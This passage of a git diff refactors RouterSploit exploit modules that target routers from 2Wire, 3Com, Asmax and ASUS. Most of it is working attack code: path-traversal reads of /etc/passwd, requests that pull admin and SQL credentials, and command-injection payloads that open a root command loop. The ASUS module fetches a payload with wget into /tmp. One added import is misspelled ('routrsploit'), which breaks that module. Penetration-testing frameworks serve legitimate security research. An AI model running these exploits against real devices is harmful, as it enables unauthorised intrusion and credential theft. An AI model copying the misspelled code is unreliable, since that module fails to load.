exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - filename = exploits.Option('/etc/passwd', 'File to read from filesystem') + target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/passwd", "File to read from the filesystem") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Sending read {} file request".format(self.filename)) - url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port) - headers = {u"Content-Type": u"application/x-www-form-urlencoded"} + headers = {"Content-Type": "application/x-www-form-urlencoded"} + data = { + "__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename), + "__ENH_SUBMIT_VALUE_SHOW__": "Acceder", + "__ENH_ERROR_REDIRECT_PATH__": "", + "username": "tech" + } - data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename), - "__ENH_SUBMIT_VALUE_SHOW__": "Acceder", - "__ENH_ERROR_REDIRECT_PATH__": "", - "username": "tech"} + response = self.http_request( + method="POST", + path="/goform/enhAuthHandler", + headers=headers, + data=data, + ) - response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return @@ -61,20 +56,21 @@ def run(self): @mute def check(self): - url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port) - - headers = {u"Content-Type": u"application/x-www-form-urlencoded"} - - data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd", - "__ENH_SUBMIT_VALUE_SHOW__": "Acceder", - "__ENH_ERROR_REDIRECT_PATH__": "", - "username": "tech"} - - response = http_request(method="POST", url=url, headers=headers, data=data) - if response is None: - return False # target is not vulnerable + headers = {"Content-Type": "application/x-www-form-urlencoded"} + data = { + "__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd", + "__ENH_SUBMIT_VALUE_SHOW__": "Acceder", + "__ENH_ERROR_REDIRECT_PATH__": "", + "username": "tech" + } + response = self.http_request( + method="POST", + path="/goform/enhAuthHandler", + headers=headers, + data=data, + ) - if "root:" in response.text: + if response and utils.detect_file_content(response.text, "/etc/passwd"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py b/routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py index 19c5fa4ba..467e6e57d 100644 --- a/routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py +++ b/routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py @@ -1,39 +1,28 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routrsploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for 2Wire Gateway devices Authentication Bypass vulnerability. - If the target is vulnerable link to bypass authentication is provided" - """ +class Exploit(HTTPClient): __info__ = { - 'name': '2Wire Gateway Auth Bypass', - 'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. ' - 'If the target is vulnerable link to bypass authentication is provided.', - 'authors': [ - 'bugz', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/9459/', - ], - 'devices': [ - '2Wire 2701HGV-W', - '2Wire 3800HGV-B', - '2Wire 3801HGV', - ], + "name": "2Wire Gateway Auth Bypass", + "description": "Module exploits 2Wire Gateway authentication bypass vulnerability. " + "If the target is vulnerable link to bypass authentication is provided.", + "authors": ( + "bugz", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/9459/", + ), + "devices": ( + "2Wire 2701HGV-W", + "2Wire 3800HGV-B", + "2Wire 3801HGV", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4, IPv6 address: 192.168.1.1") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -48,9 +37,10 @@ def check(self): mark = '
' # checking if the target is valid - url = "{}:{}/".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/", + ) if response is None: return False # target is not vulnerable @@ -60,7 +50,11 @@ def check(self): # checking if authentication can be bypassed url = "{}:{}/xslt".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/xslt", + ) + if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/3cradsl72_info_disclosure.py b/routersploit/modules/exploits/routers/3com/3cradsl72_info_disclosure.py deleted file mode 100644 index 9b9639a0b..000000000 --- a/routersploit/modules/exploits/routers/3com/3cradsl72_info_disclosure.py +++ /dev/null @@ -1,70 +0,0 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_info, - print_success, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com 3CRADSL72 Information Disclosure vulnerability. - If the target is vulnerable it allows to read sensitive information. - """ - __info__ = { - 'name': '3Com 3CRADSL72 Info Disclosure', - 'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability ' - 'that allows to fetch credentials for SQL sa account', - 'authors': [ - 'Karb0nOxyde ', # vulnerability discovery - 'Ivan Casado Ruiz ', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'http://lostmon.blogspot.com/2005/04/3com-adsl-11g-cradsl72-router.html', - 'http://www.securityfocus.com/bid/11408/exploit', - ], - 'devices': [ - '3Com 3CRADSL72', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - - resources = ["/app_sta.stm", - "/cgi-bin/config.bin"] - - def run(self): - for resource in self.resources: - url = "{}:{}{}".format(self.target, self.port, resource) - - print_status("Sending request to download sensitive information") - response = http_request(method="GET", url=url) - if response is None: - return - - if response.status_code == 200 and "password" in response.text: - print_success("Exploit success") - print_status("Reading {} file".format(resource)) - print_info(response.text) - else: - print_error("Exploit failed - could not retrieve response") - - @mute - def check(self): - for resource in self.resources: - url = "{}:{}{}".format(self.target, self.port, resource) - - response = http_request(method="GET", url=url) - if response is None: - continue - - if response.status_code == 200 and "password" in response.text: - return True - - return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/ap8760_password_disclosure.py b/routersploit/modules/exploits/routers/3com/ap8760_password_disclosure.py index d103a52a1..c835d3fd8 100644 --- a/routersploit/modules/exploits/routers/3com/ap8760_password_disclosure.py +++ b/routersploit/modules/exploits/routers/3com/ap8760_password_disclosure.py @@ -1,47 +1,37 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com AP8760 Password Disclosure vulnerability. - If the target is vulnerable it is possible to fetch credentials for administration user. - """ +class Exploit(HTTPClient): __info__ = { - 'name': '3Com AP8760 Password Disclosure', - 'description': 'Exploits 3Com AP8760 password disclosure vulnerability.' - 'If the target is vulnerable it is possible to fetch credentials for administration user.', - 'authors': [ - 'Richard Brain', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "3Com AP8760 Password Disclosure", + "description": "Exploits 3Com AP8760 password disclosure vulnerability." + "If the target is vulnerable it is possible to fetch credentials for administration user.", + "authors": [ + "Richard Brain", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.procheckup.com/procheckup-labs/pr07-40/', + "references": [ + "http://www.procheckup.com/procheckup-labs/pr07-40/", ], - 'devices': [ - '3Com AP8760', + "devices": [ + "3Com AP8760", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): creds = [] - url = "{}:{}/s_brief.htm".format(self.target, self.port) print_status("Sending payload request") - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/s_brief.htm", + ) + if response is None: return @@ -58,9 +48,10 @@ def run(self): @mute def check(self): - url = "{}:{}/s_brief.htm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/s_brief.htm", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/imc_info_disclosure.py b/routersploit/modules/exploits/routers/3com/imc_info_disclosure.py index d46601c67..0ded33141 100644 --- a/routersploit/modules/exploits/routers/3com/imc_info_disclosure.py +++ b/routersploit/modules/exploits/routers/3com/imc_info_disclosure.py @@ -1,51 +1,45 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_info, - print_success, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com Intelligent Management Center Information Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for SQL sa account. - """ +class Exploit(HTTPClient): __info__ = { - 'name': '3Com IMC Info Disclosure', - 'description': 'Exploits 3Com Intelligent Management Center information disclosure vulnerability that allows to fetch credentials for SQL sa account', - 'authors': [ - 'Richard Brain', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "3Com IMC Info Disclosure", + "description": "Exploits 3Com Intelligent Management Center information disclosure vulnerability that allows to fetch credentials for SQL sa account", + "authors": [ + "Richard Brain", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/12680/', + "references": [ + "https://www.exploit-db.com/exploits/12680/", ], - 'devices': [ - '3Com Intelligent Management Center', + "devices": [ + "3Com Intelligent Management Center", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") - resources = ["/imc/reportscript/sqlserver/deploypara.properties", - "/rpt/reportscript/sqlserver/deploypara.properties", - "/imc/reportscript/oracle/deploypara.properties"] + def __init__(self): + self.paths = [ + "/imc/reportscript/sqlserver/deploypara.properties", + "/rpt/reportscript/sqlserver/deploypara.properties", + "/imc/reportscript/oracle/deploypara.properties" + ] - valid = None + self.valid = None def run(self): if self.check(): print_success("Target seems to be vulnerable") - url = "{}:{}{}".format(self.target, self.port, self.valid) print_status("Sending request to download sensitive information") - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=self.valid, + ) + if response is None: return @@ -60,15 +54,16 @@ def run(self): @mute def check(self): - for resource in self.resources: - url = "{}:{}{}".format(self.target, self.port, resource) - - response = http_request(method="GET", url=url) + for path in self.paths: + response = self.http_request( + method="GET", + path=path, + ) if response is None: continue if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])): - self.valid = resource + self.valid = path return True # target is vulnerable return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/imc_path_traversal.py b/routersploit/modules/exploits/routers/3com/imc_path_traversal.py index 45e4a7288..3f247d982 100644 --- a/routersploit/modules/exploits/routers/3com/imc_path_traversal.py +++ b/routersploit/modules/exploits/routers/3com/imc_path_traversal.py @@ -1,47 +1,41 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_info, - print_success, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com Intelligent Management Center Path Traversal vulnerability. - If the target is vulnerable it is possible to read file from the filesystem. - """ +class Exploit(HTTPClient): __info__ = { - 'name': '3Com IMC Path Traversal', - 'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. ' - 'If the target is vulnerable it is possible to read file from the filesystem.', - 'authors': [ - 'Richard Brain', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "3Com IMC Path Traversal", + "description": "Exploits 3Com Intelligent Management Center path traversal vulnerability. " + "If the target is vulnerable it is possible to read file from the filesystem.", + "authors": [ + "Richard Brain", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/12679/', + "references": [ + "https://www.exploit-db.com/exploits/12679/", ], - 'devices': [ - '3Com Intelligent Management Center', + "devices": [ + "3Com Intelligent Management Center", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port - filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") + + filename = OptString("\\windows\\win.ini", "File to read from the filesystem") def run(self): if self.check(): print_success("Target seems to be vulnerable") - url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(self.target, self.port, self.filename) print_status("Sending paylaod request") - response = http_request(method="GET", url=url) + + path = "/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(self.filename) + response = self.http_request( + method="GET", + path=path, + ) + if response is None: return @@ -53,9 +47,11 @@ def run(self): @mute def check(self): - url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini", + ) - response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/officeconnect_info_disclosure.py b/routersploit/modules/exploits/routers/3com/officeconnect_info_disclosure.py index f97b4d41e..ee73725b9 100644 --- a/routersploit/modules/exploits/routers/3com/officeconnect_info_disclosure.py +++ b/routersploit/modules/exploits/routers/3com/officeconnect_info_disclosure.py @@ -1,54 +1,47 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_info, - print_success, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com OfficeConnect Information Disclosure vulnerability. - If the target is vulnerable it is possible to read sensitive information. - """ +class Exploit(HTTPClient): __info__ = { - 'name': '3Com OfficeConnect Info Disclosure', - 'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. ' - 'If the target is vulnerable it is possible to read sensitive information.', - 'authors': [ - 'Luca Carettoni ', # vulnerablity discovery - 'iDefense', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "3Com OfficeConnect Info Disclosure", + "description": "Exploits 3Com OfficeConnect information disclosure vulnerability. " + "If the target is vulnerable it is possible to read sensitive information.", + "authors": [ + "Luca Carettoni ", # vulnerablity discovery + "iDefense", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://old.sebug.net/paper/Exploits-Archives/2009-exploits/0902-exploits/LC-2008-05.txt', - 'http://seclists.org/vulnwatch/2005/q1/42', + "references": [ + "http://old.sebug.net/paper/Exploits-Archives/2009-exploits/0902-exploits/LC-2008-05.txt", + "http://seclists.org/vulnwatch/2005/q1/42", ], - 'devices': [ - '3Com OfficeConnect', + "devices": [ + "3Com OfficeConnect", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - resources = ["/SaveCfgFile.cgi", - "/main/config.bin", - "/main/profile.wlp?PN=ggg", - "/main/event.logs"] + def __init__(self): + self.paths = [ + "/SaveCfgFile.cgi", + "/main/config.bin", + "/main/profile.wlp?PN=ggg", + "/main/event.logs" + ] - valid = None + self.valid = None def run(self): if self.check(): - url = "{}:{}{}".format(self.target, self.port, self.valid) - print_status("Sending payload request") - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=self.valid, + ) + if response is None: return @@ -60,10 +53,12 @@ def run(self): @mute def check(self): - for resource in self.resources: - url = "{}:{}{}".format(self.target, self.port, resource) + for path in self.paths: + response = self.http_request( + method="GET", + path=path + ) - response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/3com/officeconnect_rce.py b/routersploit/modules/exploits/routers/3com/officeconnect_rce.py index 272703f01..a5b73eadf 100644 --- a/routersploit/modules/exploits/routers/3com/officeconnect_rce.py +++ b/routersploit/modules/exploits/routers/3com/officeconnect_rce.py @@ -1,39 +1,26 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - mute, - validators, - random_text, - shell -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for 3Com OfficeConnect Remote Command Execution vulnerability. - If the target is vulnerable, command loop is invoked. - """ +class Exploit(HTTPClient): __info__ = { - 'name': '3Com OfficeConnect RCE', - 'authors': [ - 'Andrea Fabizi', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "3Com OfficeConnect RCE", + "description": "Module exploits 3Com OfficeConnect remote command execution " + "vulnerability which allows executing command on operating system level.", + "authors": [ + "Andrea Fabizi", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'description': 'Module exploits 3Com OfficeConnect remote command execution ' - 'vulnerability which allows executing command on operating system level.', - 'references': [ - 'https://www.exploit-db.com/exploits/9862/', + "references": [ + "https://www.exploit-db.com/exploits/9862/", ], - 'devices': [ - '3Com OfficeConnect', + "devices": [ + "3Com OfficeConnect", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -45,22 +32,30 @@ def run(self): print_error("Target is not vulnerable") def execute(self, cmd): - url = "{}:{}/utility.cgi?testType=1&IP=aaa || {}".format(self.target, self.port, cmd) + path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd) - http_request(method="GET", url=url) + self.http_request( + method="GET", + path=path, + ) return "" @mute def check(self): - url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port) - - response1 = http_request(method="GET", url=url) + response1 = self.http_request( + method="GET", + path="/utility.cgi?testType=1&IP=aaa", + ) if response1 is None: return False # target is not vulnerable if response1.status_code == 200: - url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32)) - response2 = http_request(method="GET", url=url) + path = "/{}.cgi".format(utils.random_text(32)) + + response2 = self.http_request( + method="GET", + path=path, + ) if response2 is None or response1.text != response2.text: return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py b/routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py index 9ad67b8c8..0aafaa1c6 100644 --- a/routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py +++ b/routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py @@ -1,45 +1,35 @@ -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - print_table, - http_request, - mute, - validators, - tokenize, -) +import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Asmax AR1004G Password Disclosure vulnerability. - If the target is vulnerable it is possible to read credentials for admin, support and user accounts. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Asmax AR1004G Password Disclosure', - 'description': 'Exploits Asmax AR1004G Password Disclosure vulnerability that allows to ' - 'fetch credentials for: Admin, Support and User accounts.', - 'authors': [ - 'Marcin Bury ', # routersploit module + "name": "Asmax AR1004G Password Disclosure", + "description": "Exploits Asmax AR1004G Password Disclosure vulnerability that allows to " + "fetch credentials for: Admin, Support and User accounts.", + "authors": [ + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt', + "references": [ + "https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt", ], - 'devices': [ - 'Asmax AR 1004g', + "devices": [ + "Asmax AR 1004g", ], } - target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address - port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): creds = [] - url = "{}:{}/password.cgi".format(self.target, self.port) - print_status("Requesting {}".format(url)) - response = http_request(method="GET", url=url) + print_status("Requesting {}".format(self.get_target_url())) + response = self.http_request( + method="GET", + path="/password.cgi", + ) if response is None: print_error("Exploit failed - empty response") return @@ -51,8 +41,10 @@ def run(self): ] print_status("Trying to extract credentials") - for token in tokenize(tokens, response.text): - creds.append((token.typ, token.value[-1])) + for token in tokens: + res = re.findall(token[1], response.text) + if res: + creds.append((token[0], res[0])) if creds: print_success("Credentials found") @@ -62,9 +54,11 @@ def run(self): @mute def check(self): - url = "{}:{}/password.cgi".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/password.cgi" + ) - response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py b/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py index f9bc8b754..91d980f73 100644 --- a/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py +++ b/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py @@ -1,39 +1,27 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - mute, - validators, - shell -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Asmax AR 804 RCE', - 'authors': [ - 'Michal Sajdak ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Asmax AR 804 RCE", + "description": "Module exploits Asmax AR 804 Remote Code Execution vulnerability which " + "allows executing command on operating system level with root privileges.", + "authors": [ + "Michal Sajdak ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which ' - 'allows executing command on operating system level with root privileges.', - 'references': [ - 'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise', - 'https://www.exploit-db.com/exploits/8846/', + "references": [ + "http://www.securitum.pl/dh/asmax-ar-804-gu-compromise", + "https://www.exploit-db.com/exploits/8846/", ], - 'devices': [ - 'Asmax AR 804 gu', + "devices": [ + "Asmax AR 804 gu", ], } - target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address - port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): print_status("Checking if target is vulnerable") @@ -46,10 +34,12 @@ def run(self): print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): - """ callback used by shell functionality """ - url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd) + path = "/cgi-bin/script?system%20{}".format(cmd) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return "" @@ -58,13 +48,16 @@ def execute(self, cmd): @mute def check(self): cmd = "cat /etc/passwd" - url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd) + path = "/cgi-bin/script?system%20{}".format(cmd) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return False # target is not vulnerable - if response.status_code == 200 and "root:" in response.text: + if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py b/routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py index 2551e7790..9ec8eba96 100644 --- a/routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py +++ b/routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py @@ -1,51 +1,40 @@ import socket import struct import os +from routersploit.core.exploit import * +from routersploit.core.udp.udp_client import UDPClient -from routersploit import ( - exploits, - print_status, - print_success, - print_error, - mute, - shell, - random_text, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for multiple ASUS's Remote Code Execution vulnerability, known as infosvr UDP Broadcast root command execution aka CVE-2014-9583. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'Asus Infosvr Backdoor RCE', - 'description': 'Module exploits remote command execution in multiple ASUS devices. If the target is ' - 'vulnerable, command loop is invoked that allows executing commands on operating system level.', - 'authors': [ - 'Joshua \"jduck\" Drake; @jduck', # vulnerability discovery - 'Friedrich Postelstorfer', # original Python exploit - 'Michal Bentkowski; @SecurityMB', # routersploit module + "name": "Asus Infosvr Backdoor RCE", + "description": "Module exploits remote command execution in multiple ASUS devices. If the target is " + "vulnerable, command loop is invoked that allows executing commands on operating system level.", + "authors": [ + "Joshua 'jduck' Drake; @jduck", # vulnerability discovery + "Friedrich Postelstorfer", # original Python exploit + "Michal Bentkowski; @SecurityMB", # routersploit module ], - 'references': [ - 'https://github.com/jduck/asus-cmd', + "references": [ + "https://github.com/jduck/asus-cmd", ], - 'devices': [ - 'ASUS RT-N66U', - 'ASUS RT-AC87U', - 'ASUS RT-N56U', - 'ASUS RT-AC68U', - 'ASUS DSL-N55U', - 'ASUS DSL-AC68U', - 'ASUS RT-AC66R', - 'ASUS RT-AC66R', - 'ASUS RT-AC55U', - 'ASUS RT-N12HP_B1', - 'ASUS RT-N16', + "devices": [ + "ASUS RT-N66U", + "ASUS RT-AC87U", + "ASUS RT-N56U", + "ASUS RT-AC68U", + "ASUS DSL-N55U", + "ASUS DSL-AC68U", + "ASUS RT-AC66R", + "ASUS RT-AC66R", + "ASUS RT-AC55U", + "ASUS RT-N12HP_B1", + "ASUS RT-N16", ], } - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(9999, "Target UDP port") def run(self): try: @@ -53,11 +42,8 @@ def run(self): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("Please note that only first 256 characters of the " - "output will be displayed.") - shell(self, - architecture="armle", - method="wget", - location="/tmp") + "output will be displayed or use reverse_tcp") + shell(self, architecture="armle", method="wget", location="/tmp") else: print_error("Target is not vulnerable") except socket.error as ex: @@ -99,8 +85,8 @@ def check(self): NUM_CHECKS = 5 # we try 5 times because the exploit tends to be unstable for _ in range(NUM_CHECKS): - random_value = random_text(32) - cmd = "echo {}".format(random_value) + random_value = utils.random_text(32) + cmd = b'echo ' + random_value.encode() try: retval = self.execute(cmd) except socket.timeout: diff --git a/routersploit/modules/exploits/routers/asus/rt_n16_password_disclosure.py b/routersploit/modules/exploits/routers/asus/rt_n16_password_disclosure.py index 4f2955756..7b8e6960a 100644 --- a/routersploit/modules/exploits/routers/asus/rt_n16_password_disclosure.py +++ b/routersploit/modules/exploits/routers/asus/rt_n16_password_disclosure.py @@ -1,48 +1,37 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Asus RT-N16 Password Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for administrator. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Asus RT-N16 Password Disclosure', - 'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.', - 'authors': [ - 'Harry Sintonen', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Asus RT-N16 Password Disclosure", + "description": "Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.", + "authors": [ + "Harry Sintonen", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://sintonen.fi/advisories/asus-router-auth-bypass.txt' + "references": [ + "https://sintonen.fi/advisories/asus-router-auth-bypass.txt" ], - 'devices': [ - 'ASUS RT-N10U, firmware 3.0.0.4.374_168', - 'ASUS RT-N56U, firmware 3.0.0.4.374_979', - 'ASUS DSL-N55U, firmware 3.0.0.4.374_1397', - 'ASUS RT-AC66U, firmware 3.0.0.4.374_2050', - 'ASUS RT-N15U, firmware 3.0.0.4.374_16', - 'ASUS RT-N53, firmware 3.0.0.4.374_311', + "devices": [ + "ASUS RT-N10U, firmware 3.0.0.4.374_168", + "ASUS RT-N56U, firmware 3.0.0.4.374_979", + "ASUS DSL-N55U, firmware 3.0.0.4.374_1397", + "ASUS RT-AC66U, firmware 3.0.0.4.374_2050", + "ASUS RT-N15U, firmware 3.0.0.4.374_16", + "ASUS RT-N53, firmware 3.0.0.4.374_311", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") def run(self): - url = "{}:{}/error_page.htm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/error_page.htm", + ) if response is None: return @@ -58,9 +47,10 @@ def run(self): @mute def check(self): - url = "{}:{}/error_page.htm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/error_page.htm", + ) if response is None: return False # target is not vulnerable diff --git 